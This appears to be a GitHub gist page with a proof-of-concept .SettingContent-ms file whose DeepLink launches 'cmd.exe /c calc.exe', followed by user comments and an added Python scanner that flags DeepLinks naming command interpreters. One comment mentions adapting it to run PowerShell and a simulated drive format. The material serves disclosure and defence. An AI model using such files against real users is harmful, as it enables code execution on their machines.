enigma0x3/b948b81717fd6b72e0a4baca033e07f8
```xml
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>
```
I have used the above code to run PowerShell, bypass execution policy, and run a simulated format on drive C: See my link below.
https://github.com/bvoris/SettingContent-MS-File-Execution/
When I try the POC, I get the following message: "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item."
I can manually run %windir%\system32\cmd.exe /c calc.exe
I can manually run %windir%\system32\control.exe
I have verified that the HostID guid is the same as other native settingcontent-ms files on my computer.
I have verified that the AppID value is the same as other native settingcontent-ms files on my computer.
I am not local admin on my machine. Is admin required? Other things I am doing wrong?
I have the same problem as unhackn
That would be because it was patched with CVE-2018-8414
Wow great find man.
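For defenders triaging `.SettingContent-ms` files from mail attachments or download folders, the following is an added example (not part of the gist or its comments) that extracts each `DeepLink` value and flags those that launch a command interpreter or script host, as the file above does with `cmd.exe`. The interpreter list, the function names and the benign sample are assumptions made for illustration.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

# Assumption: illustrative list of programs that execute arbitrary commands; tune locally.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))')  # quoted or bare program path


def deeplink_targets(data):
    """Return the text of every DeepLink element, with or without the schema namespace."""
    root = ET.fromstring(data)
    return [(el.text or "").strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "DeepLink"]


def is_suspicious(deeplink):
    """True when the program a DeepLink launches is a command interpreter or script host."""
    match = FIRST_TOKEN.match(deeplink)
    if not match:
        return False
    program = ntpath.basename(match.group(1) or match.group(2)).lower()
    if not program.endswith(".exe"):
        program += ".exe"  # "cmd /c ..." resolves to cmd.exe
    return program in INTERPRETERS


def scan(data):
    """Return the suspicious DeepLink values found in one file's bytes."""
    try:
        return [link for link in deeplink_targets(data) if is_suspicious(link)]
    except ET.ParseError:
        return ["<unparseable XML>"]  # malformed files deserve a manual look


def _sample(deeplink):
    # Constructed test document: the gist's structure reduced to the DeepLink element.
    return ('<?xml version="1.0" encoding="UTF-8"?><PCSettings><SearchableContent '
            'xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">'
            '<ApplicationInformation><DeepLink>%s</DeepLink></ApplicationInformation>'
            '</SearchableContent></PCSettings>' % deeplink).encode("utf-8")


POC = _sample(r"%windir%\system32\cmd.exe /c calc.exe")                    # value from the gist
BENIGN = _sample(r"%windir%\system32\control.exe /name Microsoft.System")  # constructed

if __name__ == "__main__":
    for name, doc in (("poc", POC), ("benign", BENIGN)):
        print(name, scan(doc))
```

Pass `scan()` the raw bytes of each file under review; an empty list means no `DeepLink` matched the interpreter list, not that the file is safe.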